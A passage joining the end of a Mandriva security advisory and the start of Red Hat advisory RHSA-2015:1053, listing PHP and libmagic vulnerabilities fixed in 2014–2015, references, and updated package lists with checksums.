potentially, execute arbitrary code (CVE-2014-2270).
The BEGIN regular expression in the awk script detector in
magic/Magdir/commands in file before 5.15 uses multiple wildcards
with unlimited repetitions, which allows context-dependent attackers
to cause a denial of service (CPU consumption) via a crafted ASCII
file that triggers a large amount of backtracking, as demonstrated
via a file with many newline characters (CVE-2013-7345).
PHP FPM in PHP versions before 5.4.28 and 5.5.12 uses a UNIX domain
socket with world-writable permissions by default, which allows any
local user to connect to it and execute PHP scripts as the apache user
(CVE-2014-0185).
A flaw was found in the way file's Composite Document Files (CDF)
format parser handle CDF files with many summary info entries.
The cdf_unpack_summary_info() function unnecessarily repeatedly read
the info from the same offset. This led to many file_printf() calls in
cdf_file_property_info(), which caused file to use an excessive amount
of CPU time when parsing a specially-crafted CDF file (CVE-2014-0237).
A flaw was found in the way file parsed property information from
Composite Document Files (CDF) files. A property entry with 0 elements
triggers an infinite loop (CVE-2014-0238).
The unserialize() function in PHP before 5.4.30 and 5.5.14 has a Type
Confusion issue related to the SPL ArrayObject and SPLObjectStorage
Types (CVE-2014-3515).
It was discovered that PHP is vulnerable to a heap-based buffer
overflow in the DNS TXT record parsing. A malicious server or
man-in-the-middle attacker could possibly use this flaw to execute
arbitrary code as the PHP interpreter if a PHP application uses
dns_get_record() to perform a DNS query (CVE-2014-4049).
A flaw was found in the way file parsed property information from
Composite Document Files (CDF) files, where the mconvert() function did
not correctly compute the truncated pascal string size (CVE-2014-3478).
Multiple flaws were found in the way file parsed property information
from Composite Document Files (CDF) files, due to insufficient boundary
checks on buffers (CVE-2014-0207, CVE-2014-3479, CVE-2014-3480,
CVE-2014-3487).
The phpinfo() function in PHP before 5.4.30 and 5.5.14 has a Type
Confusion issue that can cause it to leak arbitrary process memory
(CVE-2014-4721).
file before 5.19 does not properly restrict the amount of data read
during a regex search, which allows remote attackers to cause a
denial of service (CPU consumption) via a crafted file that triggers
backtracking during processing of an awk rule, due to an incomplete
fix for CVE-2013-7345 (CVE-2014-3538). NOTE: this vulnerability exists because of an incomplete fix
for CVE-2012-1571 (CVE-2014-3587). NOTE:
this issue exists because of an incomplete fix for CVE-2014-4049
(CVE-2014-3597).
An integer overflow flaw in PHP's unserialize() function was
reported. If unserialize() were used on untrusted data, this
issue could lead to a crash or potentially information disclosure
(CVE-2014-3669).
A heap corruption issue was reported in PHP's exif_thumbnail()
function. A specially-crafted JPEG image could cause the PHP
interpreter to crash or, potentially, execute arbitrary code
(CVE-2014-3670).
If client-supplied input was passed to PHP's cURL client as a URL to
download, it could return local files from the server due to improper
handling of null bytes (PHP#68089).
An out-of-bounds read flaw was found in file's donote() function in the
way the file utility determined the note headers of a elf file. This
could possibly lead to file executable crash (CVE-2014-3710).
A use-after-free flaw was found in PHP unserialize(). An untrusted
input could cause PHP interpreter to crash or, possibly, execute
arbitrary code when processed using unserialize() (CVE-2014-8142).
sapi/cgi/cgi_main.c in the CGI component in PHP before 5.5.21, when
mmap is used to read a .php file, does not properly consider the
mapping's length during processing of an invalid file that begins
with a # character and lacks a newline character, which causes an
out-of-bounds read and might allow remote attackers to obtain sensitive
information from php-cgi process memory by leveraging the ability to
upload a .php file or trigger unexpected code execution if a valid
PHP script is present in memory locations adjacent to the mapping
(CVE-2014-9427).
Free called on an uninitialized pointer in php-exif in PHP before
5.5.21 (CVE-2015-0232).
The readelf.c source file has been removed from PHP's bundled copy of
file's libmagic, eliminating exposure to denial of service issues in
ELF file parsing such as CVE-2014-8116, CVE-2014-8117, CVE-2014-9620
and CVE-2014-9621 in PHP's fileinfo module.
S. Paraschoudis discovered that PHP incorrectly handled memory in
the enchant binding.
Taoguang Chen discovered that PHP incorrectly handled unserializing
objects.
It was discovered that PHP incorrectly handled memory in the phar
extension. NOTE: this vulnerability exists because of an incomplete
fix for CVE-2014-8142 (CVE-2015-0231).
An integer overflow flaw, leading to a heap-based buffer overflow,
was found in the way libzip, which is embedded in PHP, processed
certain ZIP archives. If an attacker were able to supply a specially
crafted ZIP archive to an application using libzip, it could cause
the application to crash or, possibly, execute arbitrary code
(CVE-2015-2331).
It was discovered that the PHP opcache component incorrectly handled
memory.
It was discovered that the PHP PostgreSQL database extension
incorrectly handled certain pointers.
PHP contains a bundled copy of the file utility's libmagic library,
so it was vulnerable to the libmagic issues. The libzip packages
has been patched to address the CVE-2015-2331 flaw.
A bug in the php zip extension that could cause a crash has been fixed
(mga#13820)
Additionally the jsonc and timezonedb packages has been upgraded to
the latest versions and the PECL packages which requires so has been
rebuilt for php-5.5.23.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7345
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0185
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0207
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0237
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0238
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1943
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2270
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3478
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3479
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3480
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3487
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3515
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3538
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3587
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3597
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3669
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3670
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3710
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4049
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4670
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4698
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4721
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8116
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8117
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8142
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9425
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9427
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9620
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9621
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9705
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0231
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0232
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0273
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1351
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1352
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2301
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2331
http://php.net/ChangeLog-5.php#5.5.9
http://php.net/ChangeLog-5.php#5.5.10
http://php.net/ChangeLog-5.php#5.5.11
http://php.net/ChangeLog-5.php#5.5.12
http://php.net/ChangeLog-5.php#5.5.13
http://php.net/ChangeLog-5.php#5.5.14
http://php.net/ChangeLog-5.php#5.5.15
http://php.net/ChangeLog-5.php#5.5.16
http://php.net/ChangeLog-5.php#5.5.17
http://php.net/ChangeLog-5.php#5.5.18
http://php.net/ChangeLog-5.php#5.5.19
http://php.net/ChangeLog-5.php#5.5.20
http://php.net/ChangeLog-5.php#5.5.21
http://php.net/ChangeLog-5.php#5.5.22
http://php.net/ChangeLog-5.php#5.5.22
http://php.net/ChangeLog-5.php#5.5.23
http://www.ubuntu.com/usn/usn-2535-1/
http://www.ubuntu.com/usn/usn-2501-1/
https://bugzilla.redhat.com/show_bug.cgi?id=1204676
http://advisories.mageia.org/MGASA-2014-0163.html
http://advisories.mageia.org/MGASA-2014-0178.html
http://advisories.mageia.org/MGASA-2014-0215.html
http://advisories.mageia.org/MGASA-2014-0258.html
http://advisories.mageia.org/MGASA-2014-0284.html
http://advisories.mageia.org/MGASA-2014-0324.html
http://advisories.mageia.org/MGASA-2014-0367.html
http://advisories.mageia.org/MGASA-2014-0430.html
http://advisories.mageia.org/MGASA-2014-0441.html
http://advisories.mageia.org/MGASA-2014-0542.html
http://advisories.mageia.org/MGASA-2015-0040.html
https://bugs.mageia.org/show_bug.cgi?id=13820
_______________________________________________________________________
Updated Packages:
Mandriva Business Server 2/X86_64:
a4e09575e26b690bd44801a126795ce9 mbs2/x86_64/apache-mod_php-5.5.23-1.mbs2.x86_64.rpm
e156aaf446f543279f758b767e5ce6f2 mbs2/x86_64/lib64php5_common5-5.5.23-1.mbs2.x86_64.rpm
cf1653dd6b3606ff8983739fe7728502 mbs2/x86_64/lib64zip2-0.11.2-1.1.mbs2.x86_64.rpm
2ed6c588ca428a502ab995726d497527 mbs2/x86_64/lib64zip-devel-0.11.2-1.1.mbs2.x86_64.rpm
91fd4a50d38c904247519a34f71ac9a7 mbs2/x86_64/libzip-0.11.2-1.1.mbs2.x86_64.rpm
0fad2aa8ca3bed422588c7d7c349e3e7 mbs2/x86_64/php-bcmath-5.5.23-1.mbs2.x86_64.rpm
b797a14554b170f1f2c307eebd5011ce mbs2/x86_64/php-bz2-5.5.23-1.mbs2.x86_64.rpm
83abadd87c78c719b585acbfcbf1f54a mbs2/x86_64/php-calendar-5.5.23-1.mbs2.x86_64.rpm
71b728b5c58335c37e9ee059a98179b5 mbs2/x86_64/php-cgi-5.5.23-1.mbs2.x86_64.rpm
d6047e2545b396ad29b2619c3d811b49 mbs2/x86_64/php-cli-5.5.23-1.mbs2.x86_64.rpm
933344ca17f96bd844db47c993b8ce1a mbs2/x86_64/php-ctype-5.5.23-1.mbs2.x86_64.rpm
0278a991ed7a7ea1d51c6651b1157744 mbs2/x86_64/php-curl-5.5.23-1.mbs2.x86_64.rpm
a3f172d95d061f6a2ba9ce562f1068ac mbs2/x86_64/php-dba-5.5.23-1.mbs2.x86_64.rpm
d239cccc6594bfe8169c0b5300ca1dd0 mbs2/x86_64/php-devel-5.5.23-1.mbs2.x86_64.rpm
73a234b9c369a20c349fca7f425b405a mbs2/x86_64/php-doc-5.5.23-1.mbs2.noarch.rpm
ab4caa5f1a397e2f267479f08616d027 mbs2/x86_64/php-dom-5.5.23-1.mbs2.x86_64.rpm
016b8d010a1866935f2a6889b712300c mbs2/x86_64/php-enchant-5.5.23-1.mbs2.x86_64.rpm
f9bd5f358336ea8a997f85f4d690fd40 mbs2/x86_64/php-exif-5.5.23-1.mbs2.x86_64.rpm
9f0ef885d5e7abb84c1b0c6242bd1a54 mbs2/x86_64/php-fileinfo-5.5.23-1.mbs2.x86_64.rpm
f551fc699944abdbd78cd1f74e1db713 mbs2/x86_64/php-filter-5.5.23-1.mbs2.x86_64.rpm
10c6ad89a0707acdff025ee0166b4361 mbs2/x86_64/php-fpm-5.5.23-1.mbs2.x86_64.rpm
fad5946e3ff8bf1d3b7215fee229b934 mbs2/x86_64/php-ftp-5.5.23-1.mbs2.x86_64.rpm
c74071a614cc4f8d5ac612736264aad2 mbs2/x86_64/php-gd-5.5.23-1.mbs2.x86_64.rpm
788e0972b5aa918a0c8ce2b0e30270a6 mbs2/x86_64/php-gettext-5.5.23-1.mbs2.x86_64.rpm
996120d4c1fa233bdb38aedf0718f593 mbs2/x86_64/php-gmp-5.5.23-1.mbs2.x86_64.rpm
e032d9a3c8e078242347623f1ff51b5a mbs2/x86_64/php-hash-5.5.23-1.mbs2.x86_64.rpm
c1da3a1898b05995091ad1c2237bdf6a mbs2/x86_64/php-iconv-5.5.23-1.mbs2.x86_64.rpm
37b4a5d86006024878d397a8478d5a42 mbs2/x86_64/php-imap-5.5.23-1.mbs2.x86_64.rpm
bd10d9a55ee8db73b4d80dae1e14e4e0 mbs2/x86_64/php-ini-5.5.23-1.mbs2.x86_64.rpm
4cb54cd72bd26728bb29f5d00a5174af mbs2/x86_64/php-interbase-5.5.23-1.mbs2.x86_64.rpm
2713dca82ad94d88b379db3fa012ed2d mbs2/x86_64/php-intl-5.5.23-1.mbs2.x86_64.rpm
f0a9187b81e038400dae4e01123b751c mbs2/x86_64/php-json-5.5.23-1.mbs2.x86_64.rpm
c395a0cb573d9432c9e4c2a4b92d1d0f mbs2/x86_64/php-ldap-5.5.23-1.mbs2.x86_64.rpm
f2374e34b874072d2268acf1c72b383a mbs2/x86_64/php-mbstring-5.5.23-1.mbs2.x86_64.rpm
7ca3ce3a9464933af1a147c206c25d0d mbs2/x86_64/php-mcrypt-5.5.23-1.mbs2.x86_64.rpm
dbe828f1c2caa3eef932fc0c14a7e2e9 mbs2/x86_64/php-mssql-5.5.23-1.mbs2.x86_64.rpm
995e9f09906309252d850618c3fffaa6 mbs2/x86_64/php-mysql-5.5.23-1.mbs2.x86_64.rpm
c474c1f1dc45f14ea5357092277d2f22 mbs2/x86_64/php-mysqli-5.5.23-1.mbs2.x86_64.rpm
cdcb4872386b83ef3969f918bf99f941 mbs2/x86_64/php-mysqlnd-5.5.23-1.mbs2.x86_64.rpm
cbb1652273fb07f216c50b8d1b5445c2 mbs2/x86_64/php-odbc-5.5.23-1.mbs2.x86_64.rpm
29ab61a3d1d00ad57c875d87b62d2e12 mbs2/x86_64/php-opcache-5.5.23-1.mbs2.x86_64.rpm
349f796a960ef2207b30a06e386f2653 mbs2/x86_64/php-openssl-5.5.23-1.mbs2.x86_64.rpm
7a7411900384da8741e32a3f6f8036c2 mbs2/x86_64/php-pcntl-5.5.23-1.mbs2.x86_64.rpm
ba3b14e45177b257ada03f7ff4b16deb mbs2/x86_64/php-pdo-5.5.23-1.mbs2.x86_64.rpm
ae5b57dbff67c7595e154313321ff693 mbs2/x86_64/php-pdo_dblib-5.5.23-1.mbs2.x86_64.rpm
8782f71797f7cb271a514b735b19621a mbs2/x86_64/php-pdo_firebird-5.5.23-1.mbs2.x86_64.rpm
ac39db58d4100f3d2d24593d3b5907fc mbs2/x86_64/php-pdo_mysql-5.5.23-1.mbs2.x86_64.rpm
210b990793c2d616fb0aecc4fde28eb6 mbs2/x86_64/php-pdo_odbc-5.5.23-1.mbs2.x86_64.rpm
6ae4df7959ddd3a8a0724ddddbe41a71 mbs2/x86_64/php-pdo_pgsql-5.5.23-1.mbs2.x86_64.rpm
1f9bdab81fa668dd583abe873892993e mbs2/x86_64/php-pdo_sqlite-5.5.23-1.mbs2.x86_64.rpm
f0cbb5dde255f5c8fa3e04e3a5314ab1 mbs2/x86_64/php-pgsql-5.5.23-1.mbs2.x86_64.rpm
e46ac8c820911a6091540e135f103154 mbs2/x86_64/php-phar-5.5.23-1.mbs2.x86_64.rpm
5050a745bfc3b1f5eeced2dd85f79721 mbs2/x86_64/php-posix-5.5.23-1.mbs2.x86_64.rpm
c9093134a518c07f4e8a188987f853d3 mbs2/x86_64/php-readline-5.5.23-1.mbs2.x86_64.rpm
2b48c3f35573e00b5ba4327e8edc05f2 mbs2/x86_64/php-recode-5.5.23-1.mbs2.x86_64.rpm
ae2157230db4d6e28698db384c8f7fcb mbs2/x86_64/php-session-5.5.23-1.mbs2.x86_64.rpm
2610a739bfa29ff11e648c7baa1d8bc3 mbs2/x86_64/php-shmop-5.5.23-1.mbs2.x86_64.rpm
b7999e11cf9d2ab510263e32cabaf312 mbs2/x86_64/php-snmp-5.5.23-1.mbs2.x86_64.rpm
ab665c30f0d2f13baa1c6475b7df7cac mbs2/x86_64/php-soap-5.5.23-1.mbs2.x86_64.rpm
f331837ba716316cef094765a1700101 mbs2/x86_64/php-sockets-5.5.23-1.mbs2.x86_64.rpm
134f8bb18790bd023e73919a794703a0 mbs2/x86_64/php-sqlite3-5.5.23-1.mbs2.x86_64.rpm
4b4aa44d0ac56629610bb0444f199df5 mbs2/x86_64/php-sybase_ct-5.5.23-1.mbs2.x86_64.rpm
fc69f644f36308d81f37f356b76e40a1 mbs2/x86_64/php-sysvmsg-5.5.23-1.mbs2.x86_64.rpm
981b7ef6715aacfe9250b206dbbbad31 mbs2/x86_64/php-sysvsem-5.5.23-1.mbs2.x86_64.rpm
91c006555173d03f1d25899947702673 mbs2/x86_64/php-sysvshm-5.5.23-1.mbs2.x86_64.rpm
62e5fa5fa8b4d89d7835f2f68169af14 mbs2/x86_64/php-tidy-5.5.23-1.mbs2.x86_64.rpm
0c5a9237c710dd098c8bb56018f7a142 mbs2/x86_64/php-timezonedb-2015.1-1.mbs2.x86_64.rpm
d94aa68a9ce76bce5c962c58f37ac5a5 mbs2/x86_64/php-tokenizer-5.5.23-1.mbs2.x86_64.rpm
317c7da32daa223560dc08bbae89d98d mbs2/x86_64/php-wddx-5.5.23-1.mbs2.x86_64.rpm
9b2cf90dfc6f6bdc0431a6f94d43a947 mbs2/x86_64/php-xml-5.5.23-1.mbs2.x86_64.rpm
0a1b6e0beeb36f24f9250a352fbff1e9 mbs2/x86_64/php-xmlreader-5.5.23-1.mbs2.x86_64.rpm
598925bc71347774e805b6fcfcbcf590 mbs2/x86_64/php-xmlrpc-5.5.23-1.mbs2.x86_64.rpm
49a1f8e773e98bb101488b805670651c mbs2/x86_64/php-xmlwriter-5.5.23-1.mbs2.x86_64.rpm
0b7c2f2fe7b3103631dd07d12d443e06 mbs2/x86_64/php-xsl-5.5.23-1.mbs2.x86_64.rpm
5cb68626d863213de934655dac8342c8 mbs2/x86_64/php-zip-5.5.23-1.mbs2.x86_64.rpm
a27bab106c0ba87f220ff35937210a63 mbs2/x86_64/php-zlib-5.5.23-1.mbs2.x86_64.rpm
3dd6a6eeb12c7207446053e4785d6974 mbs2/SRPMS/libzip-0.11.2-1.1.mbs2.src.rpm
5d69769d822628a5bf1485eaa1251b8e mbs2/SRPMS/php-5.5.23-1.mbs2.src.rpm
0a629c11ca23ba56d57f61a754def293 mbs2/SRPMS/php-timezonedb-2015.1-1.mbs2.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: php55 security and bug fix update
Advisory ID: RHSA-2015:1053-01
Product: Red Hat Software Collections
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-1053.html
Issue date: 2015-06-04
CVE Names: CVE-2014-8142 CVE-2014-9427 CVE-2014-9652
CVE-2014-9705 CVE-2014-9709 CVE-2015-0231
CVE-2015-0232 CVE-2015-0273 CVE-2015-1351
CVE-2015-1352 CVE-2015-2301 CVE-2015-2305
CVE-2015-2348 CVE-2015-2787 CVE-2015-4147
CVE-2015-4148
=====================================================================
1. Summary:
Updated php55 collection packages that fix multiple security issues and
several bugs are now available as part of Red Hat Software Collections 2.
Red Hat Product Security has rated this update as having Moderate security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.5) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - x86_64
3. Description:
PHP is an HTML-embedded scripting language commonly used with the Apache
HTTP Server. The php55 packages provide a recent stable release of PHP with
the PEAR 1.9.4, memcache 3.0.8, and mongo 1.4.5 PECL extensions, and a
number of additional utilities.
The php55 packages have been upgraded to upstream version 5.5.21, which
provides multiple bug fixes over the version shipped in Red Hat Software
Collections 1. (BZ#1057089)
The following security issues were fixed in the php55-php component:
An uninitialized pointer use flaw was found in PHP's Exif extension.
(CVE-2014-9705)
A heap buffer overflow flaw was found in PHP's regular expression
extension. (CVE-2015-2305)
A buffer over-read flaw was found in the GD library used by the PHP gd
extension.
An attacker able to trigger certain error condition in phar archive
processing could possibly use this flaw to disclose certain portions of
server memory. (CVE-2014-9652)
It was found that PHP move_uploaded_file() function did not properly handle
file names with a NULL character. (CVE-2015-2348)
A NULL pointer dereference flaw was found in PHP's pgsql extension. (CVE-2015-1352)
A flaw was found in the way PHP handled malformed source files when running
in CGI mode.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
5. Package List:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6):
Source:
php55-2.0-1.el6.src.rpm
php55-php-5.5.21-2.el6.src.rpm
x86_64:
php55-2.0-1.el6.x86_64.rpm
php55-php-5.5.21-2.el6.x86_64.rpm
php55-php-bcmath-5.5.21-2.el6.x86_64.rpm
php55-php-cli-5.5.21-2.el6.x86_64.rpm
php55-php-common-5.5.21-2.el6.x86_64.rpm
php55-php-dba-5.5.21-2.el6.x86_64.rpm
php55-php-debuginfo-5.5.21-2.el6.x86_64.rpm
php55-php-devel-5.5.21-2.el6.x86_64.rpm
php55-php-enchant-5.5.21-2.el6.x86_64.rpm
php55-php-fpm-5.5.21-2.el6.x86_64.rpm
php55-php-gd-5.5.21-2.el6.x86_64.rpm
php55-php-gmp-5.5.21-2.el6.x86_64.rpm
php55-php-imap-5.5.21-2.el6.x86_64.rpm
php55-php-intl-5.5.21-2.el6.x86_64.rpm
php55-php-ldap-5.5.21-2.el6.x86_64.rpm
php55-php-mbstring-5.5.21-2.el6.x86_64.rpm
php55-php-mysqlnd-5.5.21-2.el6.x86_64.rpm
php55-php-odbc-5.5.21-2.el6.x86_64.rpm
php55-php-opcache-5.5.21-2.el6.x86_64.rpm
php55-php-pdo-5.5.21-2.el6.x86_64.rpm
php55-php-pgsql-5.5.21-2.el6.x86_64.rpm
php55-php-process-5.5.21-2.el6.x86_64.rpm
php55-php-pspell-5.5.21-2.el6.x86_64.rpm
php55-php-recode-5.5.21-2.el6.x86_64.rpm
php55-php-snmp-5.5.21-2.el6.x86_64.rpm
php55-php-soap-5.5.21-2.el6.x86_64.rpm
php55-php-tidy-5.5.21-2.el6.x86_64.rpm
php55-php-xml-5.5.21-2.el6.x86_64.rpm
php55-php-xmlrpc-5.5.21-2.el6.x86_64.rpm
php55-runtime-2.0-1.el6.x86_64.rpm
php55-scldevel-2.0-1.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.5):
Source:
php55-2.0-1.el6.src.rpm
php55-php-5.5.21-2.el6.src.rpm
x86_64:
php55-2.0-1.el6.x86_64.rpm
php55-php-5.5.21-2.el6.x86_64.rpm
php55-php-bcmath-5.5.21-2.el6.x86_64.rpm
php55-php-cli-5.5.21-2.el6.x86_64.rpm
php55-php-common-5.5.21-2.el6.x86_64.rpm
php55-php-dba-5.5.21-2.el6.x86_64.rpm
php55-php-debuginfo-5.5.21-2.el6.x86_64.rpm
php55-php-devel-5.5.21-2.el6.x86_64.rpm
php55-php-enchant-5.5.21-2.el6.x86_64.rpm
php55-php-fpm-5.5.21-2.el6.x86_64.rpm
php55-php-gd-5.5.21-2.el6.x86_64.rpm
php55-php-gmp-5.5.21-2.el6.x86_64.rpm
php55-php-imap-5.5.21-2.el6.x86_64.rpm
php55-php-intl-5.5.21-2.el6.x86_64.rpm
php55-php-ldap-5.5.21-2.el6.x86_64.rpm
php55-php-mbstring-5.5.21-2.el6.x86_64.rpm
php55-php-mysqlnd-5.5.21-2.el6.x86_64.rpm
php55-php-odbc-5.5.21-2.el6.x86_64.rpm
php55-php-opcache-5.5.21-2.el6.x86_64.rpm
php55-php-pdo-5.5.21-2.el6.x86_64.rpm
php55-php-pgsql-5.5.21-2.el6.x86_64.rpm
php55-php-process-5.5.21-2.el6.x86_64.rpm
php55-php-pspell-5.5.21-2.el6.x86_64.rpm
php55-php-recode-5.5.21-2.el6.x86_64.rpm
php55-php-snmp-5.5.21-2.el6.x86_64.rpm
php55-php-soap-5.5.21-2.el6.x86_64.rpm
php55-php-tidy-5.5.21-2.el6.x86_64.rpm
php55-php-xml-5.5.21-2.el6.x86_64.rpm
php55-php-xmlrpc-5.5.21-2.el6.x86_64.rpm
php55-runtime-2.0-1.el6.x86_64.rpm
php55-scldevel-2.0-1.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6):
Source:
php55-2.0-1.el6.src.rpm
php55-php-5.5.21-2.el6.src.rpm
x86_64:
php55-2.0-1.el6.x86_64.rpm
php55-php-5.5.21-2.el6.x86_64.rpm
php55-php-bcmath-5.5.21-2.el6.x86_64.rpm
php55-php-cli-5.5.21-2.el6.x86_64.rpm
php55-php-common-5.5.21-2.el6.x86_64.rpm
php55-php-dba-5.5.21-2.el6.x86_64.rpm
php55-php-debuginfo-5.5.21-2.el6.x86_64.rpm
php55-php-devel-5.5.21-2.el6.x86_64.rpm
php55-php-enchant-5.5.21-2.el6.x86_64.rpm
php55-php-fpm-5.5.21-2.el6.x86_64.rpm
php55-php-gd-5.5.21-2.el6.x86_64.rpm
php55-php-gmp-5.5.21-2.el6.x86_64.rpm
php55-php-imap-5.5.21-2.el6.x86_64.rpm
php55-php-intl-5.5.21-2.el6.x86_64.rpm
php55-php-ldap-5.5.21-2.el6.x86_64.rpm
php55-php-mbstring-5.5.21-2.el6.x86_64.rpm
php55-php-mysqlnd-5.5.21-2.el6.x86_64.rpm
php55-php-odbc-5.5.21-2.el6.x86_64.rpm
php55-php-opcache-5.5.21-2.el6.x86_64.rpm
php55-php-pdo-5.5.21-2.el6.x86_64.rpm
php55-php-pgsql-5.5.21-2.el6.x86_64.rpm
php55-php-process-5.5.21-2.el6.x86_64.rpm
php55-php-pspell-5.5.21-2.el6.x86_64.rpm
php55-php-recode-5.5.21-2.el6.x86_64.rpm
php55-php-snmp-5.5.21-2.el6.x86_64.rpm
php55-php-soap-5.5.21-2.el6.x86_64.rpm
php55-php-tidy-5.5.21-2.el6.x86_64.rpm
php55-php-xml-5.5.21-2.el6.x86_64.rpm
php55-php-xmlrpc-5.5.21-2.el6.x86_64.rpm
php55-runtime-2.0-1.el6.x86_64.rpm
php55-scldevel-2.0-1.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6):
Source:
php55-2.0-1.el6.src.rpm
php55-php-5.5.21-2.el6.src.rpm
x86_64:
php55-2.0-1.el6.x86_64.rpm
php55-php-5.5.21-2.el6.x86_64.rpm
php55-php-bcmath-5.5.21-2.el6.x86_64.rpm
php55-php-cli-5.5.21-2.el6.x86_64.rpm
php55-php-common-5.5.21-2.el6.x86_64.rpm
php55-php-dba-5.5.21-2.el6.x86_64.rpm
php55-php-debuginfo-5.5.21-2.el6.x86_64.rpm
php55-php-devel-5.5.21-2.el6.x86_64.rpm
php55-php-enchant-5.5.21-2.el6.x86_64.rpm
php55-php-fpm-5.5.21-2.el6.x86_64.rpm
php55-php-gd-5.5.21-2.el6.x86_64.rpm
php55-php-gmp-5.5.21-2.el6.x86_64.rpm
php55-php-imap-5.5.21-2.el6.x86_64.rpm
php55-php-intl-5.5.21-2.el6.x86_64.rpm
php55-php-ldap-5.5.21-2.el6.x86_64.rpm
php55-php-mbstring-5.5.21-2.el6.x86_64.rpm
php55-php-mysqlnd-5.5.21-2.el6.x86_64.rpm
php55-php-odbc-5.5.21-2.el6.x86_64.rpm
php55-php-opcache-5.5.21-2.el6.x86_64.rpm
php55-php-pdo-5.5.21-2.el6.x86_64.rpm
php55-php-pgsql-5.5.21-2.el6.x86_64.rpm
php55-php-process-5.5.21-2.el6.x86_64.rpm
php55-php-pspell-5.5.21-2.el6.x86_64.rpm
php55-php-recode-5.5.21-2.el6.x86_64.rpm
php55-php-snmp-5.5.21-2.el6.x86_64.rpm
php55-php-soap-5.5.21-2.el6.x86_64.rpm
php55-php-tidy-5.5.21-2.el6.x86_64.rpm
php55-php-xml-5.5.21-2.el6.x86_64.rpm
php55-php-xmlrpc-5.5.21-2.el6.x86_64.rpm
php55-runtime-2.0-1.el6.x86_64.rpm
php55-scldevel-2.0-1.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):
Source:
php55-2.0-1.el7.src.rpm
php55-php-5.5.21-2.el7.src.rpm
x86_64:
php55-2.0-1.el7.x86_64.rpm
php55-php-5.5.21-2.el7.x86_64.rpm
php55-php-bcmath-5.5.21-2.el7.x86_64.rpm
php55-php-cli-5.5.21-2.el7.x86_64.rpm
php55-php-common-5.5.21-2.el7.x86_64.rpm
php55-php-dba-5.5.21-2.el7.x86_64.rpm
php55-php-debuginfo-5.5.21-2.el7.x86_64.rpm
php55-php-devel-5.5.21-2.el7.x86_64.rpm
php55-php-enchant-5.5.21-2.el7.x86_64.rpm
php55-php-fpm-5.5.21-2.el7.x86_64.rpm
php55-php-gd-5.5.21-2.el7.x86_64.rpm
php55-php-gmp-5.5.21-2.el7.x86_64.rpm
php55-php-intl-5.5.21-2.el7.x86_64.rpm
php55-php-ldap-5.5.21-2.el7.x86_64.rpm
php55-php-mbstring-5.5.21-2.el7.x86_64.rpm
php55-php-mysqlnd-5.5.21-2.el7.x86_64.rpm
php55-php-odbc-5.5.21-2.el7.x86_64.rpm
